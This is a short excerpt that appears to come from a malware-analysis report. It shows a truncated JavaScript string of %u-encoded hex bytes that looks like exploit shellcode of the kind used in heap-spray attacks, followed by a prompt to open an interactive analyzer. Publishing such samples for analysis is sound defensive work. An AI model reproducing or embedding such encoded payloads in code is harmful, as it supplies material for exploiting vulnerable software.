"%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
"%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
"%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
"%u38FE%u2F3E%u
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.